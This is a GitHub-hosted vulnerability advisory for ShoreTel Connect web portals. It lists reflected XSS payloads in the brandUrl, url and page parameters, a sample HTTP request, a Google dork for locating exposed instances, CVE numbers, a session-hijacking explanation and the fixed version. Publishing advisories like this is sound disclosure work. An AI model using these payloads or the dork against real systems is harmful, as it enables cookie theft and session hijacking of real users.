Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Vulnerabilities/Shoretel Connect Multiple Vulnerability
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
63 lines (42 sloc)
2.08 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Reflected XSS and Session Fixation | |
| # Google Dork: inurl:/signin.php?ret= | |
| # Date: 14/06/2017 | |
| # Author: Ramikan | |
| # Vendor Homepage: https://www.shoretel.com/ | |
| # Software Link: https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview | |
| # Version: Tested on 18.62.2000.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0 can be affected on other versions. | |
| # Tested on: Mozila Firefox 53.0.3 (32 bit) Browser | |
| # CVE :CVE-2019-9591, CVE-2019-9592, CVE-2019-9593 | |
| # Category:Web Apps | |
| Vulnerability: Reflected XSS and Session Fixation | |
| Vendor Web site: http://support.shoretel.com | |
| Version tested:18.62.2000.0, Version 19.45.1602.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0 | |
| Google dork: inurl:/signin.php?ret= | |
| Solution: Update to 19.49.1500.0 | |
| Vulnerability 1:Refelected XSS & Form Action Hijacking | |
| Affected URL: | |
| /signin.php?ret=http%3A%2F%2Fdomainname.com%2F%3Fpage%3DACCOUNT&&brand=4429769&brandUrl=https://domainname.com/site/l8o5g--><script>alert(1)</script>y0gpy&page=ACCOUNT | |
| Affected Parameter: brandUrl | |
| Vulnerability 2: Reflected XSS | |
| Affected URL: | |
| /index.php/" onmouseover%3dalert(document.cookie) style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b | |
| Affected Parameter: url | |
| Affected Version 19.45.1602.0 | |
| Vulnerability 3: Reflected XSS | |
| /site/?page=jtqv8"><script>alert(1)</script>bi14e | |
| Affected Parameter: page | |
| Affected Version:18.82.2000.0 | |
| GET /site/?page=jtqv8"><script>alert(1)</script>bi14e HTTP/1.1 | |
| Host: hostname | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-GB,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Referer: http://hostname.com/signin.php | |
| Cookie: PHPSESSID=2229e3450f16fcfb2531e2b9d01b9fec; chkcookie=1508247199505 | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 | |
| Cache-Control: max-age=0 | |
| Vulnerability 4: Session Hijacking | |
| By exploiting the above XSS vulnerability, the attacker can obtain the valid session cookies of a authenticated user and hijack the session. | |
| PHPSESSID, chkcookie both cookies are insecure. |